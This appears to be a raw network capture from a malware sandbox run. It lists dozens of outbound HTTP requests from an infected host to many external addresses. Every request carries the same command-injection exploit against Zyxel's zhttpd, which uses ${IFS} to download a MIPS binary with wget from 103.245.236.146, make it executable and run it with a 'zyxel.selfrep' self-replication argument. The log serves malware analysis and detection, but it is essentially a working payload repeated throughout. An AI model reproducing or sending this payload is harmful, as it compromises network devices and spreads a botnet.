                                                  Jan 19, 2024 18:23:57.079293013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4639192.168.2.1351736106.9.0.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079320908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4640192.168.2.133337636.86.77.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079382896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4641192.168.2.134921661.164.127.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079411983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4642192.168.2.1336954150.46.66.142443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079454899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4643192.168.2.135990850.88.159.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079489946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4644192.168.2.135593252.177.167.127443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079518080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4645192.168.2.1335600150.193.96.16443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079555035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4646192.168.2.1347268143.191.62.112443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079610109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4647192.168.2.135193227.86.211.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079631090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4648192.168.2.133577032.2.14.129443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079680920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4649192.168.2.1346802210.172.130.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079711914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4650192.168.2.1342480178.139.61.250443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079741955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4651192.168.2.134926031.154.160.68443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079787970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4652192.168.2.1358116101.160.222.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079819918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4653192.168.2.1333438218.189.164.189443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079838037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4654192.168.2.1339540135.20.149.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079899073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4655192.168.2.135448873.51.183.67443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079925060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4656192.168.2.134334093.120.50.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.079976082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4657192.168.2.1341112185.38.55.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080003977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4658192.168.2.1357486213.94.180.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080069065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4659192.168.2.1345850153.17.199.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080097914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4660192.168.2.135838220.69.118.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080157995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4661192.168.2.1338906187.137.170.119443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080183029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4662192.168.2.13465782.215.92.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080231905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4663192.168.2.135291081.189.147.225443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080274105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4664192.168.2.1358440180.55.188.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080313921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4665192.168.2.1347094124.138.254.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080358028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4666192.168.2.1333350165.221.233.181443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080398083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4667192.168.2.1343802163.1.192.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080435991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4668192.168.2.1334626151.74.233.243443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080476046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4669192.168.2.1339588216.54.162.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080507040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4670192.168.2.1350710110.54.201.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080554962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4671192.168.2.1346540124.50.189.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080590963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4672192.168.2.1343748146.107.131.83443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080615997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4673192.168.2.1334230220.62.145.134443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080666065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4674192.168.2.134232850.35.95.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080698967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4675192.168.2.134815298.121.201.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080737114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4676192.168.2.133696850.51.212.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080773115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4677192.168.2.1347724132.17.19.231443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080816984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4678192.168.2.1355584158.93.155.173443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080857992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4679192.168.2.1352628124.125.187.20443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080885887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4680192.168.2.1351724121.5.96.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080938101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4681192.168.2.134788634.171.226.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.080971956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4682192.168.2.1334422139.227.131.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081007957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4683192.168.2.1339994197.230.192.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081053019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4684192.168.2.133411839.197.204.162443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081075907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4685192.168.2.1342300204.94.231.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081101894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4686192.168.2.134874899.233.206.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081135035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4687192.168.2.135670873.170.40.195443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081149101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4688192.168.2.13493124.193.166.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081199884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4689192.168.2.135338436.181.140.105443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081226110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4690192.168.2.1336032194.192.226.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081258059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4691192.168.2.135423049.94.117.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081310987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4692192.168.2.133929854.59.253.41443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081355095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4693192.168.2.135615689.243.41.72443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081402063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4694192.168.2.1346792107.67.205.187443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081433058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4695192.168.2.135044691.40.255.116443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081463099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4696192.168.2.1358452126.93.91.252443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081502914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4697192.168.2.134323866.25.94.12443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081530094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4698192.168.2.133288017.62.68.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081563950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4699192.168.2.1355068152.52.106.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081619024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4700192.168.2.1356978130.135.180.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:57.081654072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  4701192.168.2.135266636.15.125.191443
                                                  TimestampBytes transferredDirectionData
